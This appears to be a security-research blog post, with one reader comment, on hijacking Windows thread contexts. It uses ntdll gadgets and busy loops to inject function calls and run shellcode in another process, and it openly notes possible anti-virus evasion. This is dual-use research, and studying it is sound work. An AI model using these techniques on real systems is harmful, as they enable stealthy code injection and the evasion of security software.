Context Thread ALL The Things

Table of Contents:

Abstract

In today’s post we will discuss various methods to alter memory, execute
machine code, inject (system) calls, and more in another process, using
only the thread context windows API.

Throughout the next paragraphs we will introduce the reader to the concept
of thread context, why we will use the thread context API instead of the
existing API, how we will use it to perform functionality as provided
by existing APIs (without actually using those), some improvements to the
technique, and x64 support.

Finally, we present the reader source and binaries of the methods
described, as well as a Proof of Concept which allocates an executable
page into another process, writes some shellcode to it, and executes it.

Introduction

The thread context denotes the state of a thread, it can store the value
of general purpose registers
[1], the instruction pointer (or
program counter), the eflags register
[2], floating point
registers
, and more[3].
However, in this post, we are only interested in
the general purpose registers and the instruction pointer.

Each thread has its own thread context. By altering the thread context
of another thread, we can change the execution flow of this particular
thread. We will use this technique to our advantage in order to execute
code as we like. But first, why would we want to?

Note: A friend of mine, Echo, already wrote a good Proof of Concept
a
few years ago
which illustrates most of the techniques explained in
this post, feel free to check his code as well ;)

Second Note: if anything is still unclear after reading this post, try
reading the Proof of Concept code as well, every
step is highly commented.

Why?

You might wonder why one would use techniques described in this post
instead of using the normal functions which result in the same
functionality.

For starters, because you can (or atleast after reading this post.)
Besides that, newer versions of Windows appear to have funky
side-effects [4].
And last, but not least, certain APIs which we will be emulating are
flagged by software such as Anti-Virus’ as malicious. By applying
techniques described in this post, we may or may not bypass these
Anti-Virus heuristics and/or any limitations given by such software.

Thread Context Hijacking 101

So what does it take in order to hijack the thread context of another
thread, and use it in such a way that it does our thing?

First of all, one has to obtain a thread handle to the thread which we
want to hijack, this can be done in one of the following ways (btw, this
is not a list of all possible methods.)

  • Enumerating Threads of a Process, followed by an OpenThread
    [5] call
  • Retrieve Thread Identifier based on a Window Name, using
    GetWindowThreadProcessId[6],
    followed by an OpenThread call
  • Retrieve Thread Handle after creating a new process, using
    CreateProcess[7]
  • Iterate through all Thread Handles of a process using NtGetNextThread
    [8] (after obtaining a process
    handle using e.g. NtGetNextProcess
    [8])

Once we have obtained a thread handle using our favourite method, we can
start with hijacking.

Before we do anything with the thread context, we have to suspend a
thread, otherwise the thread context API returns undefined behaviour.
(Think about it, why would you want to overwrite registers in a running
thread?)

After suspending the thread, we can obtain the thread context, modify it,
store the new thread context, and resume the thread (make the thread run
again.) We can do this as often as we want. In other words, we can resume
the thread for example five times with registers set as we like, and after
that restore the original thread context. By resuming and suspending the
thread a few times with registers set to our values, we can manipulate the
memory of the process.

In order to find gadgets that will work in the remote process, we will be
using a shared library. That is, a library that we can scan in our own
process, which (optimally) has the same base address in the other process.
In windows, the best example of this would be ntdll.dll, since it
is always loaded in a process. That being said, all of our work will be
done on the ntdll.dll library.

Gadgets

In order to manipulate the memory in the other process, we have
to find so-called gadgets. Before we dive into specific
gadgets
for different operations, we will first examine what exactly gadgets do.

Usually a gadget will do one particular instruction (such as writing data
to a register or address) and after that jump to the next gadget. In other
words, a gadget is a really, really basic sequence of instructions
(usually two to at most 10 instructions.)
For more information regarding Gadgets, you could read some more on
topics such as Return Oriented Programming
[9].

A gadget must meet the following requirements to be usable.

  • We must control all input variables
  • With the same input, the output must always be the same
  • The gadget must return into a location controlled by us

To match the first criteria, we must find a gadget which uses registers
only as input. We don’t control stack directly, so we should not use
gadgets which read from the stack. (An exception to this will be presented
later though.)

The second criteria states that the gadget should always perform the same
operations given the same input, in other words, the gadget cannot contain
any conditional jumps (and for simplicity, we also ignore relative jumps.)

Finally, the third criteria, which is pretty interesting, states that the
gadget should always return in an address controlled by the attacker. This
is because we somehow want to know when the gadget has finished execution.
A very reliable method to do this is by jumping to or returning into a
busy-loop, an instruction that jumps to itself. What happens now is that
the thread will, after executing the gadget, run into an infinite loop.
As attacker we can request the instruction pointer of the thread (by
obtaining the thread context), we know the address of the infinite loop
(as we told the thread to go there), so now we can simply wait until the
thread has reached the loop. Once we see that the gadget has finished
(because it is in the infinite loop), we can suspend it, after which the
gadget has finished execution.

Busy Loops

Before we examine the gadgets further, let’s first see what a busy-loop
is, and how we would use it in x86.

As mentioned earlier, a busy-loop is an instruction that jumps to itself.
More specifically, in x86, we use the jmp short instruction. This
is an unconditional jump with an 8bit relative offset, which is calculated
in such a way, that it points to the beginning of the instruction.
(Actually it’s called just jmp, but to make it clear that we want
an 8bit relative offset, we say jmp short.)

In assembly the instruction looks like one of the following
representations.

jmp short $
loop:
jmp short loop

This instruction is only two bytes long and therefore quite easily found
in a large library such as ntdll. Actually, the ntdll version shipped
with x86_64 Windows 7 SP1 contains 13 busy-loops.
As one is more than enough for us, this will do just fine.

Read & Write Gadgets

We have seen what criteria a gadget must meet. Now it’s time to examine
the types of gadgets which we will be using, we will be using two
different types of gadgets.

  • Read Gadget → read 32bits of data
    (one dword)
  • Write Gadget → write 32bits of data
    (one dword)

Using only these two gadgets, we will be able to do anything we want (as
we will see later.)

Now we’ve defined the types of gadgets, we have to figure out what a
gadget looks like that fulfills all three criteria.

The first criteria is fairly simple, we are only looking for gadgets which
contain an instruction that reads an address into a register, or writes
data to an address.

For a reading gadget, the following instruction will do. (It obtains the
32bit integer at an address specified by ebx and stores it into
eax, we can later retrieve the value in eax from the thread
context.)

mov eax, dword [ebx]

For a writing gadget, we reverse the operands in the mov instruction,
resulting in the following instruction. (Writes the 32bit integer in
eax to the address specified by ebx.)

mov dword [ebx], eax

The second criteria, output is always the same for a specified
input
, is fairly easy if we keep the gadgets as simple as possible.
(That is, no conditional stuff etc.)

This brings us to the last criteria, we have to be able to control where
the gadgets returns after execution. There are two easy ways to do this.

  • By jumping to an address specified in a general purpose register
  • Using a return instruction on a stack value we have overwritten

The first method is the easiest and, including the read gadget, may look
like the following. (Where ecx points to an address specified by
us.) Unfortunately research showed that this method does not give us
any gadget at all, but it’s still a nice technique to keep in mind.

mov eax, dword [ebx]
jmp ecx

Although we used hardcoded registers in this example, any register should
do (as long as the source or destination operand in the mov
instruction is not the same as the address register in the jmp
instruction.)

For example, the following example is not a valid gadget
for us (because the ebx register is referenced twice.)

mov eax, dword [ebx]
jmp ebx

The second method involves setting up the stack in such a way that it has
the address to which we want to jump, and then a return instruction.
This method requires us to do an additional 32bit write before we can do
any other reads, writes or other stuff (because we have to initialize the
stack with our return address.) A simple example follows (with a
write gadget.)

mov dword [ebx], eax
retn

Note that, in this case, the source and destination operand of the
mov instruction can not be esp (because that’s where
retn gets its return value, unless that’s what you want..)

Volatile Registers

One problem that came up during testing was the following.

When hijacking the thread context of a thread that did a simple infinite
loop, there were no problems, and the message box (see the
Proof of Concept section) was shown correctly.
However, after adding a call to Sleep in the loop, problems
occurred. That is, the registers in the write gadget were corrupted.

This has to do with non-volatile registers. Out of the eight
general purpose registers, four of them are labeled as non-volatile
(ebx, ebp, esi and edi.) Non-volatile
registers are preserved
across function calls, whereas a register such as eax is always
corrupted because the return value of the function is stored in it.

This is likely not the entire explanation, by far, but if anyone knows
more about this particular subject, please do leave a comment.

Anyway, basically if we want to be able to hijack threads which might be
in a blocking system call (e.g. Sleep
[10]), then we are limited to
gadgets which use only non-volatile registers, fortunately for us this
doesn’t give too many problems as there are plenty of gadgets left.

Injecting Function Calls

As we can now read any value from the process and write any value to the
process (you could chain multiple write commands in order to write more
than four bytes), it is now time to look into function calling in the
other process.

A function call is basically setting up the stack
correctly and jumping to the function address, this is exactly what we
will be doing.

Let’s assume that we want to call VirtualAlloc
[11] in the other process, rather than
calling VirtualAllocEx [12]
in our own process (see the difference? Using VirtualAlloc you can
allocate memory in your own process, whereas VirtualAllocEx is able to
allocate memory into another process. VirtualAlloc is like mmap(2)
[13].
)

As you can see on the MSDN page (follow the link in the footnote),
VirtualAlloc takes four parameters. What we will do is the
following.

  • We will allocate enough space for these four parameters and
    the return address (where code execution will continue after finishing
    the function call) on the stack
  • We will write the four parameters to the corresponding location on the
    stack
  • We will write the address of a busy-loop as return address
  • And finally, we will call the function

First of all we will allocate enough space on the stack. Assuming that the
remote thread has a normal stack layout, that is, esp points to the
lowest stack address currently in use, we can simply subtract our needed
space from the esp register. In order to call VirtualAlloc we need
to store five values on the stack (four parameters and the return
address.) In other words, we will be writing our parameters/data at
esp-20, where 20 represents five 32bit integers.

Now it’s time to write our data on the allocated stack space. We do this
by using our write gadgets five times in a row. So this is actually pretty
easy, once the correct gadgets have been found.

After we prepare the other thread for the particular function call, it
is now time to execute the function. We do this by pointing esp to
the address we calculated earlier (e.g. esp-20 in our example) and
besides that, we set the instruction pointer to the address of the
function we want to call.

From there on, after resuming the thread, the function will be executed
and arrive in the busy-loop after finishing. We have now successfully
executed the function, and we can read the return value in the eax
register in the thread context.

Note that some functions write output data to a memory address given by a
pointer, e.g. sprintf [14], in
this case one could read the output data from the address by chaining one
or more read gadgets.

More Robust Gadgets

The gadgets presented earlier are as basic as they come, however, since we
want our attack to be fairly robust, we will support somewhat more
advanced gadgets as well. This is because the library in the other process
(we use ntdll.dll) might not contain the basic gadgets.

Advanced mov instruction

So, let’s start with supporting mov instructions which take more
registers in the memory address.

mov ebx, dword [esi+eax*2+0x20]

In order to support this gadget, we will most-likely zero the eax
register and subtract 0×20 from the address and store that into
esi. However, if that’s not enough (e.g. this gadgets is followed
by a jmp instruction with esi as register to jump to), then
we will have to do some additional calculations (e.g.
eax = (esi – 0×20) / 2, which only works when esi is even..)

More encodings for Jump instruction

The following example is an improvement on the jmp instruction.
In this case we use a call instruction instead of a jmp
instruction. This brings a few caveats though; the instructions before the
call can not use the esp register and a 32bit address is pushed on
to the stack (controlled by the esp register.) An example read
gadget follows.

mov eax, dword [ebx]
call esi

Additional encoding for retn

Besides a normal retn instruction, there is also a variant of the
retn instruction which takes a 16bit immediate, indicating how many
bytes should be added to esp after returning (in our case, to the
busy-loop.) Other than that, the instruction is not very special, but it
is used in functions with the stdcall calling convention (also referred to
as WINAPI, by windows.) A simple example of such instruction looks like
the following.

retn 4

x64 Support

The x64 architecture is slightly different, as well as the calling
convention. Whereas x86 throws all parameters on the stack by default,
x64 has a fastcall calling convention
[15]. The first four parameters
to a function are passed to the function in general purpose registers, any
other parameters are given through the stack. In theory this means that
we could write the return address somewhere on the stack (the busy-loop is
exactly the same as in x86) and execute a function such as
VirtualAlloc simply by passing all the parameters in registers in the
thread context.

Practically, however, we might encounter problems regarding non-volatile
registers, etc.

That said, the gadgets for reading and writing remain the same as they
will be automatically “promoted” to use x64 registers. The only difference
is, obviously, that you will be working with 64bit integers and addresses.

Proof of Concept

Up-to-date source of the Proof of Concept can be found
here.
Binaries (with source as well) can be found here
here.

The Proof of Concept basically does what we discussed during this post.
First of all it enumerates all the executable sections in ntdll, then it
looks for possible gadgets in these sections (there is actually only one
section, but still.) From there, after finding a busy-loop, read gadget
and write gadget, it prepares the stack in the remote thread and calls the
VirtualAlloc function to allocate a RWX page (read, write,
execute.) It then copies some shellcode to the page and executes it, this
shellcode is a simple MessageBox call, but then again, it’s just a
Proof of Concept.

Example execution looks like the following;

$ cat target.c
#include <stdio.h>
#include <windows.h>

int main()
{
    printf("threadid: %d\n", GetCurrentThreadId());
    while (1) {
        Sleep(100);
    }
}
$ gcc target.c
$ ./a &
threadid: 9000
$ ./poc 9000
0x77b6b48d read edi dword [ebp+0xffffffe4]
0x77b931ea write dword [ebx+0xffffffe4] edi
Allocated page: 0x00300000
... msgbox pops up ...

References

  1. x86 Architecture – Wikimedia
  2. EFLAGS – Wikipedia
  3. More on x86 – Wikipedia
  4. CreateRemoteThread Limited on Windows 7
  5. OpenThread – MSDN
  6. GetWindowThreadProcessId – MSDN
  7. CreateProcess – MSDN
  8. NtGetNextProcess & NtGetNextThread – Comodo Forums
  9. Return Oriented Programming – Wikipedia
  10. Sleep – MSDN
  11. VirtualAlloc – MSDN
  12. VirtualAllocEx – MSDN
  13. mmap – linux
  14. sprintf – C++.com
  15. x64 Calling Convention – MSDN

One thought on “Context Thread ALL The Things

  1. neat.

    so, a little bit ago, i was doing nearly the exact same research along the lines of stealing a slice of processor time via thread manipulation in order to keep a continuation alive. while doing this, i also encountered what i think is the exact same problem that you were having during your tests as you’ve explained in your #tc-volatile section.

    while debugging this, i noticed that my register state would be clobbered only if i was modifying the main gui thread of a particular process…and only sometimes. it was inconsistently being messed with. anyways, once i got to this point, i wrote a test-case in an attempt to prove to someone else that i wasn’t crazy. (let me know if you want it for any reason, i imagine your testcase is similar). during my testing, i noticed that win32k was dispatching messages directly into my thread _as soon_ as i resumed execution of the thread thus messing up my register state.

    from debugging, it seemed that the kernel queues up window messages when the thread is paused. so then as soon as your thread gets execution again, the kernel seems to dispatch certain messages via one of the kernel’s xxxDispatchBlahBlah functions into the gui thread. So as soon as your thread resumes execution, these messages will actually be dispatched right before the program counter (eip) you specified is actually executed. and it’s this dispatched code that is actually responsible for mangling the registers that you consider volatile.

    unfortunately, as this was done a while ago. i don’t have the .idb handy to point to where the dispatch call is exactly, but if you’d like to discuss more about it, and perhaps try to conceive of a workaround. feel free to email me directly.

Leave a Reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>